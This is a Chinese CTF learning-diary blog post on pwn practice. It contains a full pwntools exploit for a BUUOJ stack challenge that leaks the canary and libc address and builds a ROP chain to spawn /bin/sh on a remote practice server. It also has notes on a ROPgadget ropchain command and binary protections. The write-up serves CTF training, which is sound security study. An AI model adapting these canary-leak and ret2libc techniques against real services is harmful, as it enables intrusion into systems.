pwn学习(四)

最新推荐文章于 2023-04-17 21:53:04 发布
最新推荐文章于 2023-04-17 21:53:04 发布
阅读量245 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37439229/article/details/108915269
版权

今天复现了gactf的simulator,lc3的的汇编感觉和mips满像的
pwn方面看了brop,感觉只有盲打有用,感觉对一个re手并不需要,算了就当看看吧
在刷题上,位只能说今天做的三道题都和格式化字符串有关,我都不会(好菜阿),但是学到了很多,不得不说格式化字符串好不熟练阿。。。。
others_baby_stack

from pwn import *
p = remote('node3.buuoj.cn',28992)
#p = process('./main')
elf = ELF('./main')
libc =ELF('./libc6_2.23-0ubuntu10_amd64.so')
write_addr = libc.sym['write']
write_got = elf.got['write']
puts_plt = elf.plt['puts']
#main_addr = elf.sym['main']
pop_addr = 0x400a93
p.sendlineafter('>>','1')
p.sendline('a'*(0x90-8))
p.sendlineafter('>>','2')
p.recvuntil('a\n')
canary = u64(p.recv(7).rjust(8,'\x00'))
print(hex(canary))

payload = 'a'*(0x90-8)+p64(canary) + 'b'*8
payload +=p64(pop_addr) +p64(write_got)+ p64(puts_plt) + p64(0x400908) 
p.sendlineafter('>>','1')
p.sendline(payload)
p.sendlineafter('>>','3')
leak = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print(hex(leak))
#p.interactive()
libcbase = leak - write_addr
sym_addr = libcbase + libc.sym['system']
sh_addr = libcbase + libc.search('/bin/sh').next()
payload1 = 'a'*(0x90-8) + p64(canary) + 'b'*8
payload1 += p64(pop_addr) + p64(sh_addr) + p64(sym_addr) + p64(0x400908)
p.sendlineafter('>>','1')
p.sendline(payload1)
p.sendlineafter('>>','3')
p.interactive()
#leak = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
#print(hex(leak))
p.interactive()

这道题让我知道了同一个进程的canary是一样的,puts()同样可以泄露canary,毕竟它的原理是到\x00才停,以及canary的最后一位是\x00
inndy_rop

ROPgarget --binary main --ropchain

了解了静态编译是什么。同时libc对静态编译没用,挖掘了ropgarget的新功能
secret
服了,还可以把全局变量改成got的表的地址来进行覆盖,格式化字符串没学到家阿,还得继续刷题,每天休息,不学习了

在这里插入代码片

RELRO: Full RELRO – 重定向
Stack: No canary found – 栈检查
NX: NX enabled – 不可执行
PIE: PIE enabled – 地址随机化
这个记一笔,老是忘
canary栈溢出(puts,printf泄露)
relro got表只读
nx不可执行(mprotect?)
pie(aslr)这个要怎么应对?

20000s
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF-pwn] jarvisoj_xwork
weixin_52640415的博客
10-31 178
练习记录 一道静态编译的堆栈题。把堆和栈的两个知识点加到一起 概况: 静态编译,一般这种情况有syscall和int 0x80,可以用rop或者shellcode(需要rwx段,这题没有) PIE未开,可以很容易控制指针 删除符号表,这个比较烦人,根据情况自己命名,还是是菜单题比较容易找无非就是add,free,edit,show,read,atoi之类 free很直接留着指针,add只能写31字节10次,还有edit似乎很容易解决 先大概把容易明白的函数命个名,逐个把菜单看看,有个UAF。但没
静态编译:Mprotect、自动化rop链;Ret2csu
最新发布
2301_79880752的博客
01-24 1067
开启NX,64位,IDA分析:看左半边不难看出这是一道静态编译题(简单解释,左边函数很多,静态编译占内存一般比动态多的多右半边可以看到,只有一个gets函数可以利用(存在栈溢出由于这题是静态编译题,因此我们可以有多种写法,这里我们分别使用Mprotect与自动化rop链解题。
pwn刷题num30----栈溢出修改栈上参数 或 mprotect修改内存权限 + ret2shellcode
tbsqigongzi的博客
04-27 1939
BUUCTF-PWN-get_started_3dsctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表仍可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 静态链接 Qual a palavrinha magica? 中文意思是 什么是神奇的词? 很奇怪,ida看一下伪代码 栈溢出,gets函数输入字符串给v4,未限制输入的
ADworld pwn wp - 250
fa1c4的blog
09-12 122
前言 一道非典型栈溢出题目 分析过程 int __cdecl main(int argc, const char **argv, const char **envp) { char v4; // [esp-Ch] [ebp-24h] char v5; // [esp-Ch] [ebp-24h] int v6; // [esp+Ch] [ebp-Ch] BYREF setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); p
异架构PWN-TIPS-01
kelxLZ的博客
09-01 947
在比赛中我们往往需要编写一些不同架构的shellcode,还好pwntools给我提供了shellcode框架,可以帮助我们方便的书写shellcode。下面以调试32位静态链接的arm架构程序为例,首先我们先使用qemu对应架构的指令工具来启动该程序,由于示例的程序是静态编译的,所以就没有使用。关于手写汇编一些比较取巧的办法是先用对应架构的交叉编译器用C语言写,然后用IDA之类的打开编译器出来的二进制文件,扣下哪些汇编代码即可。在安装qemu后,对于静态链接的arm程序就已经可以直接运行了,使用命令。..
Pwn学习路线及学习笔记以及gem安装
10-15
学习心得 作者认为学习Pwn需要耐心和坚持,需要一步一步地铺垫基础知识。同时,作者也认为学习Pwn需要实践和操作,需要自己搭建汇编语言运行环境,体验一下原生编程的快感。作者建议大家学习Pwn的同时,也学习...
pwn学习历程.pdf
09-30
pwn学习修炼之旅,内部包含各个模块各个知识点,有助于爱好者有方向的学习前进,加油,很好的资料哦,很有意义。
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习入门详解PPT
04-17
包括Windows内核学习,格式化字符串,栈溢出等方面
pwn学习总结(八)—— 堆(持续更新)
01-07
pwn学习总结(八)—— 堆(持续更新)前言chunk使用中(分配后)空闲中(释放后)堆块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料...
dictionary:来自pwn硬糖师傅的爆破字典
05-20
dictionary 来自pwn硬糖师傅的爆破字典 ---非最终版
Chrome v8 pwn
sky123博客
04-17 2552
它是⼀个多进程+IPC的程序, 不同的进程管理不同的内容,
(Pwn)CTF工具 ROPgadget 的安装与使用介绍
热门推荐
半岛铁盒的博客
03-10 1万+
一. 介 绍 使用此工具,您可以在二进制文件中搜索Gadgets,以方便您对ROP的利用。 我们知道x86都是靠栈来传递参数的而x64换了它顺序是rdi, rsi, rdx, rcx, r8, r9,(这里6个寄存器可以被理解为Gadgets)如果多于6个参数才会用栈我们要先知道这个特性. 有的题,里面既没有现成的system也没有/bin/sh字符串,也没有提供libc.so给我们,那么我们要做的就是想办法泄露libc地址,拿到system函数和/bin/sh字符串; 我们就需要获取rdi, rsi,
CTF-浅尝64位栈溢出PWN
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
日志2019.6.15
RobinZZX的博客
06-21 204
pwn recvuntil('aaa',drop=True/False) #drop='True'表示返回的字符串中aaa不保留 x32 payload跳转到函数func()写法 x32地址大小为4位 payload = 'a'*n + p32(func_addr) + <下一跳地址,没有可以用aaaa代替> + p32<参数1> + p32<参数2> + ...
基本ROP技巧总结
极目楚天舒的博客
05-06 5622
ROP攻击前提:存在栈溢出并且可以控制返回地址存在满足条件的gadget,如果开启了PIE保护则要想办法泄露gadget的地址ret2text程序本身存在类似于system('/bin/sh')或者execv('/bin/sh')的片段,我们可以直接将返回地址覆盖为其地址跳转到已有代码上。例子:TODOret2shellcode这种方法要求我们自己构造shellcode并控制程序跳转到我们构造的s...
ROPgadget - Gadgets finder and auto-roper
核桃树
01-21 4559
Description This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF/PE/Mach-O format on x86, x64, ARM, PowerPC, SPARC and MIPS architectu
[pwn]ROP:使用通用gadget
Breeze的博客
07-06 1万+
[详细] ROP:使用通用gadget 这次试用的是LCTF2016的试题pwn100,参考i春秋上的这篇文章 在这里详细讲解如何利用通用gadget构造一个复杂的ROP链。 通用gadget介绍 介绍一段通用的gadget,通常出现在64elf位文件的__libc_csu_init函数中(截图来自本程序pwn100,很多64位二进制文件都有): 这其中有三段gadget,第一段是 pop ...
CTF中的PWN——绕canary防护3(puts带出canary 泄露函数地址计算基地址)
壊壊的诱惑你的博客
10-14 2157
前言: 想要学好pwn,首先要看懂wp。此题断断续续占用了我两三天,原谅我太菜了。此题为攻防世界的babystack。金丝雀前文叙述过,此处不再阐述,绕过的首选办法就是想办法得到canary的值,因为程序每次load的时候canary都不同,但是一个进程中的所有方法的金丝雀的值都相同。得到canry的值后构造payload即可。 题目:babystack-攻防世界 file及...
英飞凌TC264学习PWN
10-18
好的,关于英飞凌TC264学习PWN,我可以给你一些指导。 首先,PWN是指利用程序漏洞进行攻击的技术,通常用于渗透测试和漏洞挖掘。而英飞凌TC264是一款基于ARM Cortex-M4内核的微控制器,它的安全性取决于程序的编写...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值